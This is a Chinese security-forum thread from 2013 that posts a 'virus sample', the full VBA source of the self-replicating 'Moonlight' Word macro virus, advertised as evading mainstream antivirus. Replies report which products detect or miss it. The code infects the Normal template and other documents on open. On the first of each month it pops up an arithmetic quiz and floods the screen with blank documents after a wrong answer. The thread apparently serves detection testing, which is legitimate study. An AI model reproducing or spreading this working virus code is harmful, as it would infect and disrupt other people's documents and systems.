宏病毒文件，过主流杀软。

显示全部楼层 · 发表于 2013-8-2 11:54:49

详细代码：

'Macro_2：moonlight
Dim nm(4)
Sub Document_Open()
'DisableInput 1
Set ourcodemodule = ThisDocument.VBProject.VBComponents(1).CodeModule
Set host = NormalTemplate.VBProject.VBComponents(1).CodeModule
If ThisDocument = NormalTemplate Then
Set host = ActiveDocument.VBProject.VBComponents(1).CodeModule
End If
With host
If .Lines(1, 1) <> "'moonlight" Then
.DeleteLines 1, .CountOfLines
.InsertLines 1, ourcodemodule.Lines(1, 100)
.ReplaceLine 3, "Sub Document_Close()"
If ThisDocument = NormalTemplate Then
      .ReplaceLine 3, "Sub Document_Open()"
      ActiveDocument.SaveAs ActiveDocument.FullName
End If
End If
End With
Count = 0
If Day(Now()) = 1 Then
try:
      On Error GoTo try
      test = -1
      con = 1
      tog$ = ""
      i = 0
      While test = -1
         For i = 0 To 4
            nm(i) = Int(Rnd() * 10)
            con = con * nm(i)
            If i = 4 Then
                  tog$ = tog$ + Str$(nm(4)) + "=?"
                  GoTo beg
            End If
            tog$ = tog$ + Str$(nm(i)) + "*"
         Next i
beg:
      Beep
      ans$ = InputBox$("今天是" + Date$ + ",跟你玩一个心算游戏" + Chr$(13) + "若你答错，只好接受震撼教育......" + Chr$(13) + tog$, "台湾NO.1 Macro Virus")
      If RTrim$(LTrim$(ans$)) = LTrim$(Str$(con)) Then
         Documents.Add
         Selection.Paragraphs.Alignment = wdAlignParagraphCenter
         Beep
         With Selection.Font
            .Name = "细明体"
            .Size = 16
            .Bold = 1
            .Underline = 1
         End With
         Selection.InsertAfter Text:="何谓宏病毒"
         Selection.InsertParagraphAfter
         Beep
         Selection.InsertAfter Text:="答案："
         Selection.Font.Italic = 1
         Selection.InsertAfter Text:="我就是......"
         Selection.InsertParagraphAfter
         Selection.InsertParagraphAfter
         Selection.Font.Italic = 0
         Beep
         Selection.InsertAfter Text:="如何预防宏病毒"
         Selection.InsertParagraphAfter
         Beep
         Selection.InsertAfter Text:="答案："
         Selection.Font.Italic = 1
         Selection.InsertAfter Text:="不要看我......"
         GoTo out
         Else
            Count = Count + 1
            For j = 1 To 20
                  Beep
                  Documents.Add
            Next j
         Selection.Paragraphs.Alignment = wdAlignParagraphCenter
         Selection.InsertAfter Text:="宏病毒"
         If Count = 2 Then GoTo out
         GoTo try
      End If
Wend
End If
out:
End Sub

显示全部楼层 · 发表于 2013-8-2 11:59:06

本帖最后由 pbbh07 于 2013-8-2 14:47 编辑

果然过国内三大云扫描(360网盾不报,杀毒扫描报毒)

显示全部楼层 · 发表于 2013-8-2 12:07:46

ie阻止

显示全部楼层 · 发表于 2013-8-2 12:18:04

过kis 扫描无法在沙盒内打开

显示全部楼层 · 发表于 2013-8-2 12:22:36

本帖最后由卡巴专家于 2013-8-2 12:48 编辑

ESET清除病毒
2013-8-2 12:21:09 文件系统实时防护文件 C:\Documents and Settings\Administrator\桌面\病毒\病毒.doc W97M/Moonlight.A 病毒已清除 - 已隔离 20110417-1949\Administrator 在应用程序新建的文件上发生事件: C:\Program Files\360\360zip\360zip.exe.

显示全部楼层 · 发表于 2013-8-2 12:26:00

红伞

显示全部楼层 · 发表于 2013-8-2 12:49:03

宏病毒？？？？？

微点主防表示安全。。。。。

显示全部楼层 · 发表于 2013-8-2 13:02:40

MSE 发现两个病毒： Virus:W97M/Onex.N

显示全部楼层 · 发表于 2013-8-2 13:03:29

翔无痕发表于 2013-8-2 12:07
ie阻止

你用的IE哪个版本？

显示全部楼层 · 发表于 2013-8-2 13:07:35

实机用wps打开后发现是个空文档

[病毒样本] 宏病毒文件，过主流杀软。

本帖子中包含更多资源

本帖子中包含更多资源